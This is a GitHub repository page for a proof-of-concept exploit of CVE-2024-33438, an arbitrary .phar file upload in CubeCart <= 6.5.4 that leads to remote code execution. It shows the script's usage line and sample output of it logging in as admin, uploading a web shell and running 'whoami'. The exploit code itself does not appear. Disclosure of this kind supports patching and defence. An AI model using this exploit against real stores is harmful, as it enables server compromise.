Skip to content

CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload that leads to remote code execution (RCE).

Notifications You must be signed in to change notification settings

julio-cfa/CVE-2024-33438

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 

Repository files navigation

Arbitrary File Upload Leads to RCE (CVE-2024-33438)

CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload issue that leads to remote code execution (RCE). The vulnerability affects the application's file manager and its filters by allowing attackers to upload .phar files containing malicious code. CubeCart should be updated to 6.5.5 as it implements a security patch to fix this vulnerability.

For more details, please see the official announcement by CubeCart in the references.

Exploit

An automated proof-of-concept (PoC) has been created, but this vulnerability can also be exploited manually by uploading a malicious .phar file via the file manager.

This is the usage of the PoC:

Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

After running it, this is the expected output for a successful exploitation:

python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

References

About

CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload that leads to remote code execution (RCE).

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages